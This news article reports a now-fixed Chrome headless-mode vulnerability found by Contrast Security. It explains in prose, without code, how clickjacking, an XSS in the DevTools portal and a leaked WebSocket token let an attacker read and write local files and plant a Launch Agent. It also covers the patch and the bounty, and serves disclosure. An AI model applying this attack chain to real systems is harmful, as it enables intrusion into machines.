A fixed bug in Chrome allowed attackers to read and write local files and install malicious scripts on devices running the browser’s headless interface, researchers at Contrast Security have discovered.
Since 2017, Chrome has included a headless mode that allows developers to run an instance of the browser without launching the user interface.
The headless browser can be controlled programmatically and debugged remotely and is intended for testing web applications and webpage functionality without human interaction.
In a proof-of-concept video, Contrast Security’s Matt Austin showed that by using a malicious HTML file stored locally on the device running the headless browser, an attacker can read the contents of sensitive files and write arbitrary files to the device’s hard drive.
From click-jacking to remote code execution
According to a discussion thread on the Chromium bug portal, an attacker can exploit the bug if a machine is running headless Chrome in debugging mode.
Debugging mode enables the DevTools protocol, which allows developers to remotely connect to a running instant of Chrome and perform tasks such as inspecting, profiling, and instrumenting.
The exploit works in several steps. The malicious HTML file contains an invisible iframe, placed on top of a button in the page to carry out a clickjacking attack.
The iframe’s source is set to the discovery page of the debugging portal for the headless browser. When the user clicks on it, the iframe invisibly navigates to the Chrome DevTools portal and passes on the WebSocket token in the URL.
Next, a second iframe is created in the exploit page, which uses a cross-site scripting (XSS) vector in the Chrome DevTools portal to set the href value of the page’s parent frame and the clickjacking frame to the same origin. This setting allows the page to circumvent cross-origin security policies.
The WebSocket token is then passed to the exploit page, which uses it to connect to Chrome’s remote debugging protocol. From there, the exploit page can read local files and write arbitrary files to the target device.
In the POC video, the attacker stores a malicious Launch Agent file in the target device. Launch Agent is a script that runs automatically when the user logs into the operating system.
High-severity bug
The bug, which was reported in July, was marked as severe and was fixed in the latest version of Chromium.
To prevent the exploit, Chromium was patched to prevent the embedding of the DevTools discovery page as an iframe.
The discovery page has also been deprecated and developers are recommended to use chrome://inspect instead.
The researchers who reported the bug were awarded $3,000 in bounty by the Google VRP panel.